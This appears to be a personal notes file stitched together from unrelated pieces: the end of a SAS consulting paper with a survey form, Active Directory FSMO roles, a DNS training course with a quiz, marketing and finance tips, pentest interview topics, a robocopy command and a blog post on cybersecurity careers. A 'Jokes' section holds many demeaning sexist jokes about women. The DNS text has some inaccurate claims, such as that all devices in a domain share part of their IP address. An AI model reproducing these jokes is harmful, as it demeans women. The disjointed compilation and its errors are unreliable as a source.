of the Third Annual Western Users of SAS Software Conference - 1995.
"Training in a World of Cost-Cutting and Downsizing" (Charles Edwin Shipp and Kirk Paul Lafler), Proceedings
of the Third Annual Southeast SAS Users Group Conference - 1995.
"Training in a World of Cost-Cutting and Downsizing" (Charles Edwin Shipp and Kirk Paul Lafler) - Awarded
"Best Contributed Paper", Proceedings of the Twentieth Annual SAS Users Group International (SUGI)
Conference - 1995.
Holtz, Herman, How To Succeed as an Independent Consultant, John Wiley & Sons, Inc., 1983.
Holtz, Herman, The Consultant’s Guide to Proposal Writing, Second Edition, John Wiley & Sons, Inc., 1990.
Kishel, Gregory and Patricia Kishel, How to Start and Run a Successful Consulting Business, John Wiley & Sons,
Inc., 1996.
Nelson, Bob and Peter Economy, Consulting for Dummies, IDG Books Worldwide, Inc., 1997.
Schiffman, Stephan, The Consultant’s Handbook, Adams Media Corporation, 1988.
Shenson, Howard L. Shenson on Consulting, John Wiley & Sons, Inc., 1994, 1990.
Simon, Alan R., How to be a Successful Computer Consultant, Third Edition, Mc-Graw-Hill, Inc., 1994.
Weinberg, Gerald M., The Secrets of Consulting, Dorset House Publishing, 1985.
Trademark Citations
SAS, SAS Alliance Partner, and SAS Certified Professional are registered trademarks of SAS Institute Inc. in the
USA and other countries. ® indicates USA registration.
About the Authors
Kirk Paul Lafler is consultant and founder of Software Intelligence Corporation and has been programming in SAS
since 1979. As a SAS Certified Professional and SAS Institute Alliance Member (1996 – 2002), Kirk provides IT
consulting services and training to SAS users around the world. As the author of four books including PROC SQL:
Beyond the Basics Using SAS (SAS Institute. 2004), he has written more than two hundred peer-reviewed papers
and articles that have appeared in professional journals and SAS User Group proceedings. Kirk has also been an
Invited speaker at more than two hundred SAS International, regional, local, and special-interest user group
conferences and meetings throughout North America. His popular SAS Tips column, “Kirk’s Korner of Quick and
Simple Tips”, appears regularly in several SAS User Group newsletters and Web sites, and his fun-filled SASword
Puzzles is featured in SAScommunity.org.
Charles Edwin Shipp is a programmer, consultant and author with 30 years of experience working with the SAS
and JMP software. He has written numerous articles and co-authored the popular Books by Users (BBU) book,
Quick Results with SAS/GRAPH Software. Charlie is currently involved with sasCommunity.org, consulting content
creation, and web development.
Comments and suggestions can be sent to:
Kirk Paul Lafler
Software Intelligence Corporation
E-mail: KirkLafler@cs.com
~~~
Charles Edwin Shipp
Shipp Consulting
E-mail: CharlieShipp@aol.com
Professional SAS Consultant Survey
"We are doing a survey for consulting papers on how successful consultants market and operate. Please respond,
and thanks in advance!”
Company Name: _______________________________ Consultant:______________________________________
(How you do business) Phone:_______________ Date: __________________
Web Site: _______________________________________ E-mail: ___________________________________
1. How long have you been a SAS consultant? ____ < 1 Year ____ 1 – 5 Years ____ 6 – 10 Years ____ > 10 Years
2. How is your consulting business structured? ____ Sole proprietorship ____ Partnership ____ Corporation
3. How do you get your consulting work? ____Agency ____ Teaming ____ Contract Award ____ Other
4. Have you been certified as a SAS Professional by passing the certification exam? ____ Yes ____ No
5. Are you a SAS Alliance Partner? ____ Yes ____ No If you answered ‘Yes’ to previous question, how long? _______ Years
6. Does your consulting practice require you to be portable? ____ Yes ____ No
7. How do you conduct marketing and advertising activities? ______________________________________________________
__________________________________________________________________________________________________
8. What methods do you use to improve skills? ____ CBT ____ Lecture Training/Workshops
____ SAS Manuals ____ SAS Press Books ____ User Group presentations ____ Other
9. Rate the following SAS programming/consulting categories by how successful they have been for you (1=Lowest, 10=Highest):
Unused Used Consult Teach Future
- Base SAS ____ ____ ____ ____ ____
- SQL Processing ____ ____ ____ ____ ____
- Macro Programming ____ ____ ____ ____ ____
- SAS/FSP, SAS/AF and SCL ____ ____ ____ ____ ____
- Statistical Consulting ____ ____ ____ ____ ____
- SAS/IntrNet ____ ____ ____ ____ ____
- SAS/PC ____ ____ ____ ____ ____
- SAS/Connect ____ ____ ____ ____ ____
- SAS/ETS ____ ____ ____ ____ ____
- SAS/OR ____ ____ ____ ____ ____
- SAS/Graph ____ ____ ____ ____ ____
- SAS/XML ____ ____ ____ ____ ____
- Data Mining ____ ____ ____ ____ ____
- Other ______________________ ____ ____ ____ ____ ____
10. What makes your enterprise unique and/or successful? ________________________________________________________
11. What are your goals, directions, and future plans? ___________________________________________________________
_________________________________________________________________________________________________
12. Are there any other comments that you have that haven't been asked in this survey? ________________________________
__________________________________________________________________________________________________
Thank you for participating in this survey! We expect that the results of this survey will be compiled and used within
future papers.
Figure 1. Professional SAS Consultant Survey

Servers, domain controlers and roles

FSMO Roles

Flexible Single Master Operations (FSMO, sometimes pronounced "fizz-mo") roles are also known as
operations master roles. Although the AD domain controllers operate in a multi-master model, i.e. updates can
occur in multiple places at once, there are several roles that are necessarily single instance:
Role Name Scope Description
Schema Master 1 per forest Controls and handles updates/modifications to the Active Directory schema.
Domain Naming Master 1 per forest Controls the addition and removal of domains from the forest if present
in root domain
PDC Emulator 1 per domain Provides backwards compatibility for NT4 clients for PDC operations (like
password changes). The PDCs also run domain specific processes such as the Security Descriptor Propagator
(SDPROP), and is the master time server within the domain.
RID Master 1 per domain Allocates pools of unique identifier to domain controllers for use when creating
objects
Infrastructure Master 1 per domain Synchronizes cross-domain group membership changes. The
infrastructure master cannot run on a global catalog server (GCS)(unless all DCs are also GCs.)

#####################

(DNS) – an
overview
The following is a general, non-technical introduction to the Domain Name
System and how it works on the Internet. If you are looking for specific
information on how the domain name space is organised, how domains can
be acquired, or how DNS servers do what they do, you might want to go
directly to ‘More about the Domain Name System (DNS)’.
What is DNS?
Having a domain, e.g. ‘mycompany.com’, is an important step in
establishing an identity for a business on the Internet. People enter the
domain as part of an e-mail address or a Web address. Really, what the
network uses to route traffic is not domain names as such, but the
corresponding IP addresses. The translation between fully qualified domain
names and IP addresses is taken care of by DNS servers. Thus, one of the
advantages of DNS is that it saves us from having to memorise long IP
addresses because we can use intuitive domain names instead.
The abbreviation DNS is used to describe two related things: the Domain
Name System and the Domain Name Service. The Domain name system is
the distributed database responsible for the domain name-to-IP address
conversion, while the Domain Name Service, as the name implies, is the
service offered by this system.
DNS affects almost every other Internet service, from e-mail, surfing on the
Web, to audio conferencing. For instance, when someone enters a domain
name (e.g. ‘www.company.com’) into the address field of a browser and
sends off the request, they are making use of DNS. Furthermore, DNS
servers (also known as name servers) hold information on what mail server
that e-mail for a given domain should be delivered to, enabling us to use
e-mail addresses in the format ‘username@domain’, which doesn’t specify a
particular mail server.
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
1 of 10 1/10/2011 5:59 PM
How does DNS work?
DNS is a distributed database. DNS service is offered by thousands of DNS
servers on the Internet, each responsible for a portion of the name space
called a zone. The servers that have access to the DNS information (zone
file) for a zone is said to have authority for that zone. When queried by for
instance a Web server, the DNS server translates the domain name into the
corresponding IP address. For example, the domain name
‘www.example.com’ might translate to ‘195.24.22.209’.
When TCP/IP software is installed on a Windows workstation, the IP address
of one or more name server(s) is one of the configured parameters. This is
the name server that the host (or really, the browser application on the
host) should direct its query to when looking for the IP address of for
instance a Web server on the Internet (given that this server has a fully
qualified domain name). It is also the server responsible for telling other
servers on the Internet how to get in touch with the workstation, if this
should be desired (again given that the workstation has a fully qualified
domain name). A fully qualified domain name, like ‘www.example.com’
consists of a hostname (‘www’) as well as a domain (‘example.com’).
No single one of the thousands of name servers on the Internet knows all
the keys for translating domain names into IP addresses and vice versa, but
each server knows the names and IP address of every user’s computer on
its branch of the Internet (zone). The server then exchanges this information
with other domain name servers from other corners of the net, thus
enabling domain name addressed communication between hosts on different
networks.
The Internet would work without DNS, of course, but it would mean that all
traffic would have to be addressed using IP addresses.
More about the Domain Name System (DNS)
The following provides a closer look at the specifics of DNS, including a
description of how the domain name space is organised, how domains can
be acquired, and how DNS servers do what they do.
Pros and cons of maintaining your own DNS server
There are two basic ways to configure DNS. One option is to use the DNS
server of an Internet service provider. The other is to set up a DNS server
on your local network.
Having and maintaining your own primary DNS server leaves the job of
configuring and updating the server on your shoulders. On the other hand, it
also gives you a number of benefits:
Firstly, a local DNS server can give your company a measure of
security. If you are running IP network-based applications inside
your network that require users to connect to internal machines by
name, it is not a great idea to advertise the names and addresses of
these machines. DNS can give hackers a map of your network, so
setting up an internal DNS server that does not publish information to
the Internet can be a good idea.
Secondly, a local DNS server lets you be the master of your own
domain. If your Web site often moves around or changes, managing
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
2 of 10 1/10/2011 5:59 PM
your own primary DNS server allows you to make changes, additions,
and delitions at your own pace without involving your Internet service
provider. For instance you can add hosts and create subdomains
within your domain, e.g. ’subdomain.company.com’ – maybe to
advertise your company’s new exciting product by giving the product
its own Web site on the Internet.
Another important issue is reverse name mapping; some Internet
service providers keep reverse name information only for servers and
not for the individual host systems. In this case, users may not be
able to connect to FTP or other information servers that attempt to
reconcile the user’s hostname with the IP address before granting
access.
Having a DNS server on your local network, however, will mean increased
traffic to and from your network, which you may be billed for. Another issue
to consider is whether your DNS server is to have authority for hosts on
other networks than your local area network, e.g. for the Web server of a
remote branch of your company. If this is the case, access from the Internet
to the Web server on the remote network may be cut off if for some reason
your DNS server could not be reached. (As for Web servers etc. on your own
network, they would be unreachable regardless of where your DNS server
was situated if connectivity to your network was lost.)
The domain hierarchy
The domain name space is organised in a hierarchy comprising a top-level
domain, and/or a subdomain, and/or a hostname. The Internet naming
hierarchy is best understood if a fully qualified domain name, like
‘mail.company.com’ is read from right to left. In ‘mail.company.com’, ‘com’
is the top-level domain,‘company’ is a subdomain under this top-level
domain, while ‘mail’ indicates the particular host – here a mail server.
Generic top-level domains include ‘com’, ‘org’ and ‘net’. Other top-level
domains use international two-letter country codes, such as ‘ca’ (Canada),
‘de’ (Germany), ‘es’ (Spain), and ‘fr’ (France).
Strictly speaking, fully qualified domain names should be written with a dot
at the end (the root zone), e.g. 'mail.company.com.", however, in this
course we imply the last dot.
A fully qualified domain name consists of different parts
Top-level domains and IP network addresses are assigned and maintained
by The Internet Corporation for Assigned Names and Numbers (ICANN),
which is responsible for the overall co-ordination and management of the
DNS. A second and third level of domain administrators are responsible for
the hostname and address assignment within the subdomains.
The domain hierarchy can be represented by an inverted tree (also called
the domain name space). At the very top of the hierarchy one finds a small
number of root name servers, which contain pointers to master name
servers for each of the top-level domains. There are currently thirteen such
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
3 of 10 1/10/2011 5:59 PM
root servers on the Internet. These servers all contain identical information -
there are ten servers purely for backup reasons.
The DNS tree: At the very top of the hierarchy one finds a small number of
root name servers. The next level, ‘com’, ‘edu’, etc., consists of top-level
domains, while x and y indicate subdomains (for instance ‘ CompanyX’ and
‘CompanyY’). The hosts,’Computer 1’,’ Computer 2’, etc., reside at the
lowest level in the hierarchy
In the DNS tree, everything under a particular point in the tree (e.g. ‘com´)
falls into that particular domain. In the illustration above, both ‘computer
1´, ‘company X´ as well as ‘company Y´ thus fall within the ‘com’ domain.
The fully qualified domain name of any host in the tree is the path from that
host to the root (‘up’ the tree) with dots separating the names in the path.
Thus the fully qualified domain name of the host ‘computer 1’ is
‘computer1.companyX.com’. All devices in the same same domain share a
part of their IP address.
A DNS server’s zone is all the domain names that the server has been given
authority over. This means that the server has a list of all the domain
names, plus information about how to get to each of them. A zone is a
pruned domain and thus might not include all the subdomains and hosts
within a given domain. The pruning occurs when zones are delegated to
individual servers. The zones thus relate to the way the DNS database is
partitioned and distributed.
If a company uses the mail or Web server of an Internet service provider, it
can use the Internet service providers’ domain (e.g. ‘isp.net’) as part of the
company’s Web address or e-mail address. However, some providers might
allow companies to use their own domain (e.g. ‘mycompany.com’), if the
company has one registered. If a company has its own mail or Web server
and wish to use it for their own domain (e.g. 'mycompany.com'), the
domain must be registered with an official domain name service registry in
order to be reachable for others on the Internet.
Querying a DNS server
When you type in a URL – for instance `http://www.company2.com´– in the
address field of a browser program, a query is sent to the DNS server
(indicated in the hosts TCP/IP configuration) asking for the corresponding IP
address. The DNS server may not contain the information about the
particular destination host. In that case, it will attempt to solve the problem
by forwarding the query to another name server that is higher up in the
domain name hierarchy. If that query is not successful, the second server
will ask yet another – until it finds one that knows.
The path of enquiry follows the domain name hierarchy.
Imagine for instance, that you are working in ‘company1’ and have decided
to take a look at the Web site of your closest competitor ‘company2’. The
domain name for this Web site is ‘www.company2.com’. The following
illustrates the steps involved in converting this domain name into the
corresponding IP address:
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
4 of 10 1/10/2011 5:59 PM
Example of a DNS enquiry path
The query is initiated when you type the domain name of the
computer that you wish to contact, ‘www.company2.com’, into the
address/location field of your browser and hit enter. Upon this
command, your workstation contacts its primary DNS server to see if
it knows the IP address of `www.company2.com´.
1.
The requested domain name does not fall within the zone of
company1’s DNS server, and consequently, the server does not hold
the required information. Therefore, the server turns to a root server
for help. (Root servers are servers, which maintain information about
all the top-level domains). Every DNS server on the Internet must
know the IP addresses of the about 10 root domain name servers.
2.
The root server holds information on the top-level domains, but
usually not on subdomains. The root server therefore passes the
query along to the server which is responsible for the’.com’ domain.
The authoritative server for a top-level domain like ‘.com’ contains
information on which name-server is responsible for each subdomain
in its zone, thus also for ‘company2.com’.
3.
The ‘.com’ server, in turn, refers to the authoritative server for the
‘company2.com’ domain. The DNS server for a subdomain, such as
‘company2.com’, contains detailed addressing information about the
hosts in its zone, including the Web server (www).
4.
Upon receiving the query, the DNS server responsible for the
‘company2.com’ domain looks at its table of hostnames and
corresponding IP addresses and, via the previously queried servers,
supplies your primary DNS server with the IP address of the server
called 'www.company.com’.
5.
Once the information is located and returned to your DNS server,
your server passes the information back to your workstation.
6.
You are on your way! Your workstation is now able to contact
‘www.company2.com’ using the corresponding IP address supplied by
the DNS server.
7.
Usually this entire process occurs quickly (within seconds).
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
5 of 10 1/10/2011 5:59 PM
However, if the server has recently answered a query the same hostname
(within a time period set by the administrator of the authoritative DNS
server's zone to prevent passing old information), it will not have to go
through this whole process again, as it can quickly locate the information in
its cache and reply directly.
In the example above, the DNS servers behave as 'recursive'. A recursive
DNS server takes on the burden of querying other name servers to come up
with a more fulfilling answers to queries than its own data provides. A
non-recursive DNS server, on the other hand, simply looks in its local data
and returns the best answer it has to a given query. In other words, while
the recursive server asks the next server for more information, the
non-recursive server only goes as far as to suggest to the server who
queried it, that it go query someone else!
The DNS is also used the other way around – for instance someone running a
Web site might like to log the names of the computers which have visited
the site. The server programs do this by doing a reverse query (reverse
name mapping), that is, asking the DNS system for the corresponding
domain name for a given IP address.
The DNS records can be examined with a number of common TCP/IP tools.
The most common DNS lookup utilities are ‘NSLOOKUP’ and ‘Host’.
DNS, which was designed in 1984, is one of the key elements that has
allowed the Internet to grow as it has. The old system consisted of a single
file, known as the host table, maintained by the Stanford Research
Institute's Network Information Center (SRI-NIC). If this system had
continued, the static file would not only be absolutely gigantic, but would
also be constantly out of date. With DNS, when any site needs to add or
remove computers, they simply update their portion of the database and,
after a short period, everyone on the Internet can see the change!
Acquiring a domain name
Domain names have to be registered with an official domain name
service registry. There are two ways of doing this. You either pay an
Internet service provider (ISP) to do it for you, or you contact a domain
name registry and complete the application process yourself.
Top-level domains (like ‘.com’) and IP network addresses are assigned and
maintained by The Internet Corporation for Assigned Names and Numbers
(ICANN), which is responsible for the overall co-ordination and management
of the DNS. The ICANN in turn allocates blocks of IP address space to
Regional Internet Registries (RIRs): InterNIC in North America, RIPE in
Europe, and APNIC in Asia. These regional domain registries again allocate
blocks of IP address space to Local Internet Registries (LIRs), which in turn
assign the addresses to end users (with or without the aid of an Internet
service provider).
When a domain name is registered, it is added to the DNS of the top-level
domain. If the domain ‘example.com’ was registered, it would be entered in
the DNS of the ‘.com’ domain.
When registering a domain, the registrant has to supply a (number of)
contact person(s) which is responsible for the administration, technical
maintenance of the DNS server and financing of the domain. One person or
company can be responsible for more than one area.
The three contacts which need to be supplied are:
The administrative contact. This is the owner 1. of the domain, that
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
6 of 10 1/10/2011 5:59 PM
is, the person to contact is someone wants to reach whoever is in
authority of the domain. The technical term for this contact is
ADMIN-C.
The technical contact. This is the person or organisation
responsible for the host mastering of the domain. This is whom should
be contacted if the domain has been set-up wrong, or if changes or
additions have been made to the domain. The technical term for this
contact is TECH-C.
2.
The billing contact. The person 3. who pays the bills.
In addition to the contact information, you also need to supply information
about on which name servers the domain is going to reside. These name
servers are called the authoritative name servers, because they have
authority over the domain, which means that these are the servers that all
other name servers and hosts will ask for information about the domain –
such as the IP addresses of hosts and where to deliver mail.
The authoritative name servers must be updated when a change to the
domain is made. The technical term for this is ‘reloading a zone’.
If you want reverse name mapping (finding the domain name for a given
IP address) to be possible for your domain, you must also register a
so-called 'in-addr.arpa' domain. This is a special domain which has been
added at the top-level of the domain tree to make reverse DNS mapping
possible. It is special in the sense that there can be exactly 256 subdomains
at each level, and that the label names can only be the numbers 0-255. An
example is 1.12.123.195.in-addr.arpa. The registered domains under
in-addr.arpa corresponds to reversed IP addresses (the IP address in the
label name above would normally be written 195.123.12.1). The IP
addresses are reversed because the label to the left is the most specific in a
domain name, while the most specific label in an IP address is the octet to
the right. It is of course only possible to register an 'IP address domain' if
the IP address in question is assigned to you.
Primary and secondary DNS servers
There should always be one and only one DNS server which has direct
access to the DNS information in the zone file for a particular domain. This
DNS server is called the primary domain name server for the domain.
The secondary domain name server is a DNS server which downloads a
copy of the primary domain name server's zone file periodically. Secondary
domain name servers do this by querying the primary domain name server
(usually every 6 hours or so, but the domain administrator can set this check
as often as he or she likes) to see if the primary's information has changed.
If it has, the secondary simply downloads the entire table again from the
primary.
A zone can have as many secondary domain name servers as the DNS
administrator likes. To make them useful, the administrator has to make
sure that the parent level domain DNS administrator knows about them, or
else the secondary servers will never get queried even if the primary server
cannot be contacted.
Some administrators choose to use the primary server as secondary server
as well by entering the primary server in both fields in the domain
registration form. It saves the administrator from having to provide two
servers, but it has the disadvantage that the whole network is unreachable
from the Internet if the server cannot be contacted. However, in scenarios
where the primary name server and for instance a Web server is hosted on
the same computer, this is less of a problem. In this case, the physical set
up means that if the computer cannot be contacted and connectivity
between the DNS server and the Internet is thus lost, having a secondary
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
7 of 10 1/10/2011 5:59 PM
name server on a different network will still not enable anyone to access the
information on the Web server, as the Web server cannot be reached if the
computer cannot be reached!
Resource records
The information that a DNS server needs to answer queries from hosts on
the Internet is kept in a number of resource records (RRs). The information
in the resource records is entered and updated by the server administrator.
The two most common resource records are:
A: The Address Record. This record supplies the IP address for a
given hostname. The hostnames are assigned by the DNS server
administrator. You will need A records for any public servers you
maintain (servers which should be accessible from the Internet). The
most common hostnames are ‘www’ and ‘mail’ that are used to
identify Web servers and mail servers. You may also want to set up A
records for each of your workstations if your users use FTP (File
Transfer Protocol) to download software from the Internet. This is
because some FTP sites perform a lookup to get the domain name of
the machine from which they receive download requests. If the
machine has no name, the site rejects the request. Since hosts can
have multiple IP addresses, corresponding to multiple physical
network interfaces, it is possible for multiple A records to match a
given domain name. Similarly, one IP address may also have several
corresponding hostnames. This may be configured using CNAME
records (se below).
MX: The Mail Exchange Record. This record indicates which host(s)
handles electronic mail for the domain, and offers a method of
prioritising the order of mail servers that e-mails to the domain
should be attempted delivered to. An MX record has two parts: the
name of the machine that will accept mail for the domain, and a
preference value. A domain can have multiple MX records such as the
following: mail1.company.com 0; mail2.company.com 10, and
mail3.company.isp.net 100. In this case, mail delivery will be
attempted to mail1.company.com first because it has the lowest
preference value (0). If delivery fails (for instance because this server
is down or deems the e-mail address unknown), mail2.company.com
will be tried next as specified in the MX record, and so on. Each of the
hosts mentioned in your MX records needs an A record to associate
them with an IP address.
The Mail exchange record is what makes it possible to have e-mail
addresses in the format ‘user@domain.com’ that use the domain without
specifying the specific host (the mail server). If no MX record was created
for a domain, the specific domain of every mail server within the domain
would have to be specified though an entry in the address record (A), and
the e-mail address for the user would look something like
user@mail1.domain.com.
Other DNS resource records include:
SOA: The Start of Authority Record, which indicates the primary
name server (origin), the responsible DNS administrator, the rules
that govern the secondary name servers’ queries to the primary
name server for zone file updates, as well as a default TTL. TTL (Time
To Live) is the length of time that non-authoritative name servers are
allowed to keep the resource records in their short term memory
(cache), before they have to be discarded.
CNAME: The Canonical Name Record, which supplies host alias
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
8 of 10 1/10/2011 5:59 PM
names. It is possible to define multiple A records for a given address,
thus providing alias, or alternate, hostnames. It is usually easier to
supply one A record for a given address and use CNAME records to
define alias hostnames for that address.
PTR: The Pointer Record, which associates a hostname with a given
IP address. These records are used for reverse name lookups.
Reverse lookups can be used to limit access to for instance a server
on the net to those from a specific domain or with a specific domain
name. An example: you have a Web server on the Internet that you
only want certain users to be allowed to connect to. Through a
reverse look up when someone intends to connect to the server, it
can be established if the visitor’s domain is on the list of allowed
visitors and, thus, if access should be granted. Reverse look up is also
useful for companies wishing to monitor what kind of Internet users
visit their Web site.
NS: The Name Server Record, which defines the name server(s)
for a given domain.
Test your knowledge
1.
What does DNS stand
for?
Domain Name System and Domain Name
Service
Data Name System and Data Name Server
Domain Number Server and Domain Number
Service
2.
What does a DNS server
do?
It translates data between incompatible
systems
It translates IP addresses to fully qualified
domain names and vice versa
It translates IP addresses into MAC
addresses
3.
What is a zone? All the devices on a local area network
A portion of the name space that a DNS
server has authority over
A portion of the name space that no DNS
server has authority over
4.
What does it mean that a
DNS server has authority
over a zone?
That the server has access to the information
in the zone file (including IP addresses and
fully qualified domain names for the devices
in the zone)
That the DNS server administrator must give
his or her permission when a website in the
zone is visited
That the zone has not yet been set up
5.
Which of the following is
a fully qualified domain
name?
192.168.0.1
lasat.dk
www.lasat.dk.
6.
Indicate the domain in www.lasat
The Domain Name System (DNS) http://www.dialogic.com/support/helpweb/safepipe/SP/courses/dns/index.htm
9 of 10 1/10/2011 5:59 PM
www.lasat.dk www
lasat.dk
7.
Indicate the top-level
domain in www.lasat.dk
www.lasat.dk
.lasat
.dk
8.
What is a root server? A back-up server you must always have on
your local area network
A server that contains pointers to the
authoritative name servers for all top-level
domains
A server that contains direct pointers to all
DNS servers on the Internet
9.
What is a primary DNS
server?
The DNS server which has direct access to
the zone file with DNS information for a
domain
The DNS server which downloads a copy of
the zone file with DNS information
periodically
Another name for a root server
10.
What is an MX record? The record that specifies where undeliverable
mail should be sent to
The record that specifies the modem records
for a domain
The record that specifies which mail servers
handle mail for a domain

Turn Social Media into a Marketing Business

Turn Social Media into a business?

1) Progression
2) Your goal is Steady growth, not fast growth!
3) Become a storyteller
4) Vlogging (video blogging) (to tell a story)

###########

7 Social media platforms:
1. Instagram (just highlights of events)
2. YouTube (long form)
3. Snapchat (the new TV, least trash talking)
4. Facebook (all of the marketing at once) (not as cool anymore, but it's a scrolling tool and a mix of everything) (great ad platform, data company)
5. Podcast (it's a radio, hands/eye free while playing something)
6. Twitter (chatter, trash, news, fun)
7. Live streaming (virtual reality, the most interactive with lots of comments)
8. The 'Wild card' is email lists (old school and powerful)

###########

The Richest Man in Bablyon has 7 basic principles

The Richest Man in Bablyon has 7 basic principles:

1) Start thy purse to fattening - save/invest
2) Control thy expenditures - watch out for self serving brokers
3) Make thy gold mutiply - use powerful investments
4) Guard thy treasures from loss - watch out for brokers with their hot tips.
5) Make of thy dwelling a profitable investment - rental properties, your own home---but stay within your means.
6) Insure a future income - do work that you love to do. Become excellent at it.
7) Increase thy ability to earn - education never stops. Keep reading good books like this one, The Millionaire Next Door, Rich Dad Poor Dad and so on.

Pentest interview

First: phone interview and questions

Port numbers, SQL injection attack/remediation, CSRF, XSS, DMZ identification, network pivoting, common exploits, OSI layer, differences between TCP and UDP, phases of IPSEC, phases of SSH negotiation, breaking the logic of the session cookies,

Technical assessment:
a web app that had a couple of vulns

Onion Style tests!

3rd Phases: face to face presentation of the report to the stakeholders

General talk with the directors and managers

Hard and frustrating

Jokes

If your father is a poor man, it is your fate.
But, if your father-in-law is a poor man...it's your stupidity.
............................................................ .................................................

If it's true that we are here to help others,

then what exactly are the others here for?
........................................ .................................................

Behind every successful man, there is a woman

And behind every unsuccessful man, there are two.
.................................................

The more you learn, the more you know,

the more you know, the more you forget,

the more you forget, the less you know.

So.. why learn?.
............................................................ ................................................. ...

What's the difference between masturbation and sex?
There is not difference, except that when you have sex, you get to know people.
--------
Why do women have smaller feet than men?
It's one of those "evolutionary things" that allows them to stand closer to the kitchen sink.
------------------------------------------------------------ -------
How do you know when a woman is about to say something smart?
When she starts a sentence with "A man once told me..."
------------------------------------------------------------ -------
How do you fix a woman's watch?
You don't. There is a clock on the oven.
------------------------------------------------------------ -------
Why do men pass gas more than women?
Because women can't shut up long enough to build up the required pressure.
------------------------------------------------------------ -------
If your dog is barking at the back door and your wife is yelling at the front door, who do you let in first?
The dog, of course. He'll shut up once you let him in.
------------------------------------------------------------ -------
What's worse than a Male Chauvinist Pig?
A woman who won't do what she's told
------------------------------------------------------------ -------
Scientists have discovered a food that diminishes a woman's sex drive by 90%.
It's called a Wedding Cake.
----------------------- -------
Women will never be equal to men until they can walk down the street with a bald head and a beer gut, and still think they are sexy.
---------------------------
Medical Distinction

We've all heard about people having guts or balls. But do you
really know the difference between them? In an effort to keep you
informed, the definition for each is listed below...

GUTS - Is arriving home late after a night out with the guys,
being met by your wife with a broom, and having the guts to ask: "Are
you still cleaning, or are you flying somewhere?"

BALLS - Is coming home late after a night out with the guys,
smelling of perfume and beer, lipstick on your collar, slapping your
wife on the butt and having the balls to say: "You're next."

I hope this clears up any confusion on the definitions.
Medically speaking, there is no difference in the outcome,
since both ultimately result in death.

RoboCopy command

robocopy "\\10.10.4.100\E:\documents\*.*" "\\us-filer1\us-cifs01$\US-Users\Angelas" /S /E /ZB /COPY:DATSO /MIR /R:5 /W:5

Starting your own CyberSecurity Company - Part I and II

Part 1:

Find really talented computer security people, know your ISO 9000 and 27000 auditing techniques well, then start pounding on doors and working hard. Most large companies have a security team. They will hire you only if your team is better. Anyone else you have to have a 30 second pitch on why your services will protect the customer and save money. Word of mouth spreads fast for a good company in this field. Just remember that over half of the "security" problems are actually management system problems. Know how to identify both.

####
Why You Might Not Want That Cybersecurity Job
Update: I receive occasional inquiries for cybersecurity career advice because of this post. I haven't worked in this field in years, so I recommend you read this advice if you're trying to get a cybersecurity job.

Cybersecurity, while offering lucrative job opportunities, might not be an ultimately rewarding career for Maryland technologists. I worked in this sector for about eight years as a military officer, government civilian, and government contractor in a variety of different roles, and here's what I want to say about it.

Maryland's business press, government officials, and various tech organizations have lately been enthusiastically banging the gong for cybersecurity. I can appreciate why - there's a lot of money at stake, and a lot of it comes from Maryland's foremost benefactor, the federal government. This is a recession-proof, guaranteed-to-grow industry, and Maryland is already home to many successful cybersecurity companies like Sourcefire. The government and private companies employ many thousands of people and contribute many millions of dollars to our tax base.

So it makes sense for our government to be pursuing these opportunities, but does it make sense for you, Maryland hacker? Here are some things to consider; these are obviously generalizations extrapolated from my experience. Feel free to leave comments if you feel this is a gross distortion.

    Cyber defense is often the opposite of a creative activity; in many of these jobs you're going to find yourself acting as an enforcer, a mere gatekeeper. You'll be telling the creative people in your organization all the things they can't do or aren't allowed to have. Often you'll be restricting them not because of policy reasons but because it's too hard to figure out how to allow them to do what they want within the regime you are enforcing (Naturally this does not apply if you work for a company that builds the tools the enforcers use) or because it's just easier to say "no".

    In classified settings, you are severely restricted in the sources and kinds of technologies you use. You'll be leaving your smartphone and your iPad in your car or in a locker outside the SCIF. You won't have admin permissions on the machine you're working on. Forget installing Chrome with the latest extensions, you'll be lucky to get version 2 of Firefox! Or you might not have access to the Internet at all! Also, forget about telecommuting or riding your bike to work; your job will be in a well-defended federal facility or an anonymous office park in the suburbs.

    Because cybersecurity is so tied to "the enterprise", you'll almost certainly be living in Microsoft land, which may or may not be a problem for you.

    Many of the government organizations in this field are gigantic, top-down, and super-hierarchical. You will made to turn as a soulless cog in a giant machine. There are plenty of smaller, more enlightened companies out there, of course, but the highest paying jobs will probably be offered by big contractors.
    The federal government has crazy monopsony power over this sector. Besides the usual and expected bureaucratic games you'll endure, if you work for a private company that does much business with the government you are going to see some brutally depressing market distortions that arise from this monopsony. You may find yourself working on a product or a program that nobody in your client agency cares about, or wants to succeed, except that they need to spend up their budget dollars so Congress doesn't take the money away next year. Or you might find your job in limbo because the sales cycle for getting government contracts is so long, and it can take forever for the company to actually have money in hand. There's some truth to the myths about the Pentagon spending $10K on toilet seats - it probably does cost about $9950 in sales salaries to sell a $50 toilet seat to the Department of Defense!

I was well-paid as a cybersecurity analyst, and often I did enjoy the work, and parts of it involved amazingly cool, James-Bond-like exploits. But those are the reasons I ultimately chose to leave. Now I am working on my own startup. My job is less glamorous (I'm not "saving the world" every day) but because my individual contribution counts thousands of times more in a small company which I own a piece of, and because every second and every dollar counts, it's an infinitely more satisfying way to spend my time. My labors are simply more meaningful. So that's what I wanted you to know.

UPDATE 8/16/10: Please check out @NetSecGuy's post where he further elaborates on these issues.

POSTSCRIPT FOR MARYLAND GOVERNMENT AND BUSINESS LEADERS

I applaud you for positioning the state to take advantage of the "cyber doom boom". I'm sure it will help many of my fellow citizens in the short term. But I wonder how much wealth you think cybersecurity is ultimately going to create in Maryland, especially if it accrues to big consulting companies like Booz-Allen that aren't even based here. Also, what's going to happen when this sector matures, when Internet security gets better, and spending declines? Who's going to fill up those office parks and abandoned SCIFs?

